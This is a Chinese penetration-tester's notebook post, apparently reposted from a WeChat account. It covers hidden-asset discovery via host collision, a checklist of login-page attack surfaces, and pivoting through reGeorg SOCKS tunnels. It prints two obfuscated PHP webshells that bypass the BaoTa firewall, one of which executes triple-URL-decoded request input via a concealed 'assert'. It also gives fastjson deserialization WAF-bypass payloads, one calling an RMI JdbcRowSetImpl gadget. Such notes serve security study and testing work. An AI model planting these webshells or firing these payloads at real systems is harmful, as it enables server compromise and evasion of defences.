前言
最近捡起了鸽了很久的repository,毕竟暑假开始了,是时候开始慢慢填坑了:
虽然建repo的目的主要是为了做笔记、备忘,但同时也希望能有更多人看到,可以从中或多或少的得到点帮助。
# 🤡
https://github.com/0wlsec
目录:
关注更新请移步
https://github.com/0wlsec/pentestNote
隐藏资产探测-host碰撞
step1: 搜集子域名
step2: 搜集IP (目标域名历史解析IP)
step3: 以IP+域名的形式进行碰撞
传送:
https://github.com/fofapro/Hosts_scan
https://github.com/shmilylty/OneForAll
https://fofa.so/
https://site.ip138.com/
https://ipchaxun.com/
https://securitytrails.com/list/apex_domain/ # 子域名
参考:
https://www.cnblogs.com/Rain99-/p/13756032.html
https://xz.aliyun.com/t/9590
"登录框" 攻击面
-
用户名枚举
-
空口令
-
弱口令
-
登录认证绕过
-
暴力破解
-
图形验证码绕过
-
短信验证码绕过(或爆破)
-
短信轰炸(重放)
-
邮箱轰炸(重放)
-
密码明文传输
-
SQL注入(万能密码)
-
任意用户密码重置
-
目录遍历
-
敏感信息泄露
-
框架漏洞(shiro)
-
XSS
宝塔防火墙 Bypass
-
传参方式 $_COOKIE
-
编码绕过流量检测
3重 base64 失败(似乎检测了关键字‘base64’)
3重 url编码 成功
贴两个
demo1:
$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p=$p[91]($p[90],$p[59]($p[31])))&&$p()):$p;
demo2:
$poc ="axsxsxexrxt";
$poc_1 = explode("x", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];
$poc_2(urldecode(urldecode(urldecode($_REQUEST[x]))));
fastjson bypass 某WAF
demo
{{"@type":"java.net.URL","val":"http://.dnslog.cn"}:0
bypass
{"@type":b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}
内网渗透-代理(reGeorg+Proxifier+Win)
https://github.com/sensepost/reGeorg
https://pc.qq.com/detail/13/detail_10593.html
上传对应的tunnel文件,如图即可
然后attack-pc 执行
python2 reGeorgSocksProxy.py -u http://192.168.10.211/tunnel.nosocket.php -p 8888
proxifier配置代理如下
-
127.0.0.1:8888
-
socks5
内网渗透-代理(reGeorg+proxychains+Linux)
https://github.com/sensepost/reGeorg
https://pc.qq.com/detail/13/detail_10593.html
上传对应的tunnel文件,如图即可
然后attack-pc 执行
python2 reGeorgSocksProxy.py -u http://192.168.10.211/tunnel.nosocket.php -p 4561
proxychains配置如下:
-
vim /etc/proxychains.conf
demo: 使用proxychains代理远程登录windows
proxychains rdesktop -g 1440x900 172.17.17.7:3389 //-g后面代表要使用的分辨率
内网渗透-代理(ssocks反向代理)
https://sourceforge.net/projects/ssocks/
参考:
https://apt404.github.io/2016/09/12/ssocks/
持续更新ing
本文始发于微信公众号(don9sec):梦游般的实战笔记-更新ing
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论